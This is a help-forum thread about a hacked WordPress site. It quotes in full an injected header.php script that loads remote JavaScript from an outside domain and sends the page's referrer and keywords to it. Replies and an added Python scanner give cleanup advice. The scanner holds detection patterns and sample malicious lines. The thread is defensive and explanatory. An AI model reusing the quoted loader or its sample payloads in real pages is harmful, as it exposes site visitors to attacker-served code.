My website is a WordPress site. The following code appears in Header.php every few hours; when I delete it, it appears again after a few hours. Please note that the link in the code, "shiro-maga.com", changes every time. The code is as follows:
<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://shiro-maga.com/js/jquery.min.php?c_utt=G91825&c_utm='+encodeURIComponent('http://shiro-maga.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script>
I believe that the theme is infected ("scan shows no malware"), so it generates this script. Could you please advise how to find the source of this script?
Thanks
Definitely malicious. Your site has been compromised. You can use the following detailed article to find and remove the source of the infection: http://ottopress.com/2009/hacked-wordpress-backdoors/. A program like Windows Grep will help you run a quick scan on all your theme files for keywords like eval and base64. Remove all suspicious strings of code from your theme and then update the WordPress core files to ensure you are running a clean version. Alternatively, if you have a backup, restore your theme's backup and update your site with a clean updated version of WP.
A quick fix to prevent reinfection is to CHMOD header.php to 444 (read only). The site will work and will not be reinfected, giving you time to find the infection.
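The keyword scan suggested in the replies above, as an added example that is not part of the original thread: it walks a theme directory, flags files containing eval, base64_decode or the injected loader's URL shape, and reports whether each flagged file is still writable. The pattern set, function names and sample files are assumptions made for this sketch.

```python
import os, re, stat

# Heuristic patterns: assumptions for this example, not a complete signature set.
PATTERNS = {
    "eval": re.compile(rb"\beval\s*\(", re.I),
    "base64_decode": re.compile(rb"base64_decode\s*\(", re.I),
    "remote_loader": re.compile(rb"jquery\.min\.php\?c_utt=", re.I),
    "document_write_script": re.compile(rb"document\.write\(\s*['\"]<script", re.I),
}
WRITE_BITS = stat.S_IWUSR | stat.S_IWGRP | stat.S_IWOTH

def scan_file(path):
    """Return the sorted names of all patterns found in one file."""
    with open(path, "rb") as fh:
        data = fh.read()
    return sorted(name for name, rx in PATTERNS.items() if rx.search(data))

def scan_tree(root):
    """Map each flagged .php/.js file (path relative to root) to its findings."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".js")):
                continue
            full = os.path.join(dirpath, name)
            hits = scan_file(full)
            if hits:
                st = os.stat(full)
                findings[os.path.relpath(full, root)] = {
                    "hits": hits,
                    "writable": bool(st.st_mode & WRITE_BITS),  # False once chmod 444
                    "mtime": st.st_mtime,  # recent changes hint at reinfection
                }
    return findings

def build_sample(root):
    """Write a small constructed theme directory (sample data, not real files)."""
    samples = {
        "header.php": "<script>document.write('<script src=\"http://example.invalid/"
                      "js/jquery.min.php?c_utt=X\"><'+'/script>');</script>\n",
        "functions.php": "<?php @eval(base64_decode('ZWNobyAxOw==')); ?>\n",
        "footer.php": "<?php wp_footer(); ?>\n",
    }
    for name, body in samples.items():
        with open(os.path.join(root, name), "w") as fh:
            fh.write(body)

if __name__ == "__main__":
    import sys
    for path, info in sorted(scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items()):
        print(path, info["hits"], "writable" if info["writable"] else "read-only")
```

Legitimate plugins also use eval and base64_decode, so treat each hit as a file to read, not as proof of infection.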